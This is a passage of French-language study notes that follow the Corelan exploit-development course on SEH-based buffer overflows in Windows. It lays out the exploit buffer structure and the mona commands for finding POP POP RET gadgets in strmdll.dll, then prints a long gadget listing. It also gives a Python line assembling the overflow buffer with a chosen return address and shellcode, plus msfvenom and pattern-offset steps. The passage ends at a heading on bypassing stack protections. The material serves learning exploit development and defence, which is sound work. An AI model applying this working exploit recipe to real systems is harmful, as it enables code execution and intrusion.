Dans certains cas on peut avoir besoin de faire un simple short jump de quelques bytes. Dans ce cas le short jump a la forme suivante:
- jmp 0x10 => 0xeb 0x10
Partie 3: SEH Based exploits
Basé sur la troisième partie du cours de Corelan sur le développement d’exploits.
La structure global d’un exploit basé sur SEH est la suivante:
[JUNK][Short JMP ][Address to POP, POP, RET][NOPs][Shellcode]
[????][Address to next SEH][Address of SEH Handler ][???????????????]
On utilise un pattern pour identifier l’offset nécessaire pour écraser Address of SEH Handler. Au moment du crash, immunity bloque l’execution et nous demande si on souhaite lancer l’exception (avec SHIFT+F7/F8/F9). Au moment du blocage on peut voir l’état des adresses liées à SEH en faisant ALT+S.
Une fois cela fait il faut écraser cette adresse avec l’adresse d’une instruction de la forme POP, POP, RET. Mona peut servir à faire cela:
!mona seh -m strmdll.dll
Le résultat est le suivant:
0BADF00D [+] This mona.py action took 0:00:00
0BADF00D [+] Command used:
0BADF00D !mona seh -m strmdll.dll
---------- Mona command started on 2016-04-24 07:04:16 (v2.0, rev 566) ----------
0BADF00D [+] Processing arguments and criteria
0BADF00D - Pointer access level : X
0BADF00D - Only querying modules strmdll.dll
0BADF00D [+] Generating module info table, hang on...
0BADF00D - Processing modules
0BADF00D - Done. Let's rock 'n roll.
0BADF00D [+] Querying 1 modules
0BADF00D - Querying module strmdll.dll
704D0000 Modules C:\Windows\system32\TAPI32.dll
0BADF00D [+] Setting pointer access level criteria to 'R', to increase search results
0BADF00D New pointer access level : R
0BADF00D [+] Preparing output file 'seh.txt'
0BADF00D - (Re)setting logfile seh.txt
0BADF00D [+] Writing results to seh.txt
0BADF00D - Number of pointers of type 'pop esi # pop edi # ret 0x10' : 1
0BADF00D - Number of pointers of type 'pop esi # pop edi # ret ' : 1
0BADF00D - Number of pointers of type 'pop esi # pop ebp # ret 0x0c' : 13
0BADF00D - Number of pointers of type 'pop ebx # pop ebp # ret 0x10' : 10
0BADF00D - Number of pointers of type 'pop eax # pop esi # ret ' : 7
0BADF00D - Number of pointers of type 'pop eax # pop ebp # ret 0x04' : 7
0BADF00D - Number of pointers of type 'pop eax # pop ebp # ret 0x08' : 4
0BADF00D - Number of pointers of type 'call dword ptr ss:[ebp-0c]' : 6
0BADF00D - Number of pointers of type 'pop ebx # pop ebp # ret 0x0c' : 22
0BADF00D - Number of pointers of type 'pop esi # pop ebp # ret 0x10' : 6
0BADF00D - Number of pointers of type 'pop esi # pop ebx # ret 0x10' : 1
0BADF00D - Number of pointers of type 'pop edi # pop esi # ret ' : 48
0BADF00D - Number of pointers of type 'pop esi # pop ebp # ret 0x1C' : 1
0BADF00D - Number of pointers of type 'pop esi # pop ebx # ret ' : 24
0BADF00D - Number of pointers of type 'pop ebx # pop ebp # ret 0x1C' : 1
0BADF00D - Number of pointers of type 'pop ecx # pop esi # ret ' : 2
0BADF00D - Number of pointers of type 'pop edi # pop ebp # ret 0x08' : 3
0BADF00D - Number of pointers of type 'pop eax # pop ebp # ret 0x0c' : 2
0BADF00D - Number of pointers of type 'pop ebx # pop ebp # ret 0x08' : 41
0BADF00D - Number of pointers of type 'pop ebp # pop ebx # ret 0x0c' : 3
0BADF00D - Number of pointers of type 'pop ebx # pop ebp # ret 0x04' : 57
0BADF00D - Number of pointers of type 'pop edi # pop ebp # ret 0x04' : 1
0BADF00D - Number of pointers of type 'pop esi # pop ebp # ret 0x04' : 128
0BADF00D - Number of pointers of type 'call dword ptr ss:[ebp-04]' : 1
0BADF00D - Number of pointers of type 'pop esi # pop ebp # ret 0x08' : 49
0BADF00D - Number of pointers of type 'call dword ptr ss:[ebp-18]' : 1
0BADF00D [+] Results :
48035BC5 0x48035bc5 : pop esi # pop edi # ret 0x10 | {PAGE_EXECUTE_READ} [strmdll.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.1.00.3936 (C:\Windows\system32\strmdll.dll)
4802C86E 0x4802c86e : pop esi # pop edi # ret | {PAGE_EXECUTE_READ} [strmdll.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.1.00.3936 (C:\Windows\system32\strmdll.dll)
4800564B 0x4800564b : pop esi # pop ebp # ret 0x0c | null {PAGE_EXECUTE_READ} [strmdll.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.1.00.3936 (C:\Windows\system32\strmdll.dll)
4800699D 0x4800699d : pop esi # pop ebp # ret 0x0c | null {PAGE_EXECUTE_READ} [strmdll.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.1.00.3936 (C:\Windows\system32\strmdll.dll)
4800DAB3 0x4800dab3 : pop esi # pop ebp # ret 0x0c | null {PAGE_EXECUTE_READ} [strmdll.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.1.00.3936 (C:\Windows\system32\strmdll.dll)
4800DBAF 0x4800dbaf : pop esi # pop ebp # ret 0x0c | null {PAGE_EXECUTE_READ} [strmdll.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.1.00.3936 (C:\Windows\system32\strmdll.dll)
48018C2F 0x48018c2f : pop esi # pop ebp # ret 0x0c | {PAGE_EXECUTE_READ} [strmdll.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.1.00.3936 (C:\Windows\system32\strmdll.dll)
4801B752 0x4801b752 : pop esi # pop ebp # ret 0x0c | {PAGE_EXECUTE_READ} [strmdll.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.1.00.3936 (C:\Windows\system32\strmdll.dll)
48021FFA 0x48021ffa : pop esi # pop ebp # ret 0x0c | {PAGE_EXECUTE_READ} [strmdll.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.1.00.3936 (C:\Windows\system32\strmdll.dll)
48022179 0x48022179 : pop esi # pop ebp # ret 0x0c | ascii {PAGE_EXECUTE_READ} [strmdll.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.1.00.3936 (C:\Windows\system32\strmdll.dll)
48022478 0x48022478 : pop esi # pop ebp # ret 0x0c | ascii {PAGE_EXECUTE_READ} [strmdll.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.1.00.3936 (C:\Windows\system32\strmdll.dll)
4802B319 0x4802b319 : pop esi # pop ebp # ret 0x0c | {PAGE_EXECUTE_READ} [strmdll.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.1.00.3936 (C:\Windows\system32\strmdll.dll)
4802D744 0x4802d744 : pop esi # pop ebp # ret 0x0c | {PAGE_EXECUTE_READ} [strmdll.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.1.00.3936 (C:\Windows\system32\strmdll.dll)
4802FC91 0x4802fc91 : pop esi # pop ebp # ret 0x0c | {PAGE_EXECUTE_READ} [strmdll.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.1.00.3936 (C:\Windows\system32\strmdll.dll)
4802FEB2 0x4802feb2 : pop esi # pop ebp # ret 0x0c | {PAGE_EXECUTE_READ} [strmdll.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.1.00.3936 (C:\Windows\system32\strmdll.dll)
4800C91B 0x4800c91b : pop ebx # pop ebp # ret 0x10 | null {PAGE_EXECUTE_READ} [strmdll.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.1.00.3936 (C:\Windows\system32\strmdll.dll)
4800DED4 0x4800ded4 : pop ebx # pop ebp # ret 0x10 | null {PAGE_EXECUTE_READ} [strmdll.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.1.00.3936 (C:\Windows\system32\strmdll.dll)
48021B81 0x48021b81 : pop ebx # pop ebp # ret 0x10 | {PAGE_EXECUTE_READ} [strmdll.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.1.00.3936 (C:\Windows\system32\strmdll.dll)
480244D2 0x480244d2 : pop ebx # pop ebp # ret 0x10 | {PAGE_EXECUTE_READ} [strmdll.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.1.00.3936 (C:\Windows\system32\strmdll.dll)
480263C6 0x480263c6 : pop ebx # pop ebp # ret 0x10 | {PAGE_EXECUTE_READ} [strmdll.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.1.00.3936 (C:\Windows\system32\strmdll.dll)
0BADF00D ... Please wait while I'm processing all remaining results and writing everything to file...
0BADF00D [+] Done. Only the first 20 pointers are shown here. For more pointers, open seh.txt...
0BADF00D Found a total of 440 pointers
0BADF00D
0BADF00D [+] This mona.py action took 0:00:01.622000
Il faut ensuite ajouter un short jump avant l’adresse. L’exploit construit aura la forme suivante:
content = "A"*(offset-4)+"\x90\xeb\x05\x90"+"\x6e\xc8\x02\x48"+nop*32+buf+nop*1000
Payloads
Lors de l’utilisation de MSFVenom pour créer un payload il est important d’ajouter le paramètre suivant:
EXITFUNC=SEH
Partie 4: Speed Up Exploit Dev
Basé sur la quatriéme partie du cours de Corelan.
Note: dans le cours de Corelan on présente des outils pour WinDBG. Dans ce wiki on se concentre sur mona & Immunity.
Trouver un pattern
Il est possible de trouver l’offset d’un pattern avec mona:
!mona pattern_offset 43386F43
!mona po 43386F43
Partie 6: Bypassing Stack Cookies, SafeSeh, SEHOP, HW DEP and ASLR
Basé sur la sixième partie du cours de Corelan sur le développement d’exploits.